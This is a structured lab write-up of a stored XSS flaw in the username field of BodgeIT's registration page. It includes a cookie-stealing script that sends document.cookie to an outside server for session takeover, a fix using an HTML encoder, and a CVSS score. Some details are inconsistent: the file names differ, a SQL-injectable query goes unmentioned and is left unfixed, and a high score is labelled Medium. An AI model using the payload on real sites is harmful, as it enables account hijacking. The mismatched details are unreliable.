## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/register.jsp - username (Parameter)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-592: Stored XSS -detailed-
      http://capec.mitre.org/data/definitions/592.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Run unintended JS code
  Recommendation:
    Sanitize user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/
    Then I can login and buy products as my own user

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/contact.jsp"
    """
    ...
    29  stmt.executeQuery("INSERT INTO Users (name, type, password) VALUES ('" +
    username + "', 'USER', '" + password1 + "')");
    30  rs = stmt.executeQuery("SELECT * FROM Users WHERE (name = '" + username
    + "' AND password = '" + password1 + "')");
    31  rs.next();
    32  userid =  "" + rs.getInt("userid");
    33
    34  session.setAttribute("username", username);
    35  session.setAttribute("usertype", "USER");
    36  session.setAttribute("userid", userid);
    ...
    """
    Then I see it doesn't sanitize the inputs used for registering

  Scenario: Dynamic detection
  Fuzzing for XSS
    Given I register with the username "<script>alert(1)</script>@gmail.com"
    Then I get an alert in the welcome page
    Then I know it's vulnerable to XSS

  Scenario: Exploitation
  Exfiltrate sensitive data via XSS
    Given I know there's an XSS vuln
    And the admin has access to a dashboard with a user list
    Then I register a user with name
    """
    <script>document.location='http://myserver/?c='+document.cookie</script>
    @gmail.com
    """
    Then when the admin accesses the user list, I'm getting his session cookies
    And I can take over his session to do as I want

  Scenario: Remediation
  Sanitizing user input
    Given I Install OWASP Java Encoder in the project
    And patch the code as follows
    """
    ...
    username = Encoder.forHtml(username);
    29  stmt.executeQuery("INSERT INTO Users (name, type, password) VALUES ('" +
    username + "', 'USER', '" + password1 + "')");
    30  rs = stmt.executeQuery("SELECT * FROM Users WHERE (name = '" + username
    + "' AND password = '" + password1 + "')");
    31  rs.next();
    32  userid =  "" + rs.getInt("userid");
    33
    34  session.setAttribute("username", username);
    35  session.setAttribute("usertype", "USER");
    36  session.setAttribute("userid", userid);
    ...
    """
    Then XSS isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.7/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-14
